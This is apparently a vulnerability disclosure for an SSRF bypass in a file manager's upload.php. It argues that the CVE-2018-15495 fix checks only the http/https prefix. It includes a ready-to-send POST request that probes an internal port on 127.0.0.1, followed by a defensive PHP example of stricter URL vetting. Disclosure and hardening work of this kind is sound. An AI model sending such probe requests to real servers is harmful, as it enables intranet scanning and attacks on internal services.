In upload.php we can download a picture from a remote server. The code is in lines 68~91.
On Jul 27, 2018, a fix was committed to limit the URL in order to prevent the SSRF vulnerability CVE-2018-15495,
but the fix only checks that the `url` parameter starts with http:// or https://.
We can still use the HTTP protocol to probe the intranet and attack intranet servers. For example:
```
POST /filemanager/upload.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9gov40jg57e4bo2olu5rqr8oc0; login=76a61a8504394f9c08ec4d7d747d3377
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

fldr=test/&url=http://127.0.0.1:2233/aaaaaaa
```
When the port is open, the response will be `{"error":"Invalid URL"}`.
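
A stricter check than the scheme-prefix test described in this report, as an added example (not part of the original report and not the project's own code): the hypothetical helpers `vet_remote_url` and `fetch_vetted` resolve the host, reject loopback, private and reserved addresses, and pin the vetted address for the actual request. The 80/443 port allowlist and the injectable `$resolver` are assumptions made for the example.

```php
<?php
// Added example: hypothetical helpers, not code from the project.

// True only for addresses outside private, loopback, link-local and reserved ranges.
function is_public_ip(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Returns ['host', 'port', 'ip'] for an acceptable URL, or null to reject it.
// $resolver is injectable so the check can be exercised without real DNS.
function vet_remote_url(string $url, ?callable $resolver = null): ?array
{
    $p = parse_url($url);
    if (!is_array($p) || !isset($p['scheme'], $p['host'])) return null;
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) return null;
    if (isset($p['user']) || isset($p['pass'])) return null;   // no userinfo tricks
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) return null;        // assumed port policy
    $host = trim($p['host'], '[]');                            // strip IPv6 brackets
    // gethostbynamel() returns IPv4 answers only; literal IPs skip resolution.
    $ips = filter_var($host, FILTER_VALIDATE_IP)
        ? [$host]
        : ($resolver ? $resolver($host) : (gethostbynamel($host) ?: []));
    if ($ips === []) return null;
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) return null;   // any internal answer rejects the URL
    }
    return ['host' => $host, 'port' => $port, 'ip' => $ips[0]];
}

// Fetch with the vetted address pinned, so a second DNS lookup cannot differ.
function fetch_vetted(string $url, array $t)
{
    $pin = $t['host'] === $t['ip'] ? [] : ["{$t['host']}:{$t['port']}:{$t['ip']}"];
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RESOLVE        => $pin,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false,       // a redirect would bypass the check
        CURLOPT_RETURNTRANSFER => true,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}
```

The URL from the request above (`http://127.0.0.1:2233/aaaaaaa`) is rejected at the port check, and would also fail `is_public_ip` on port 80.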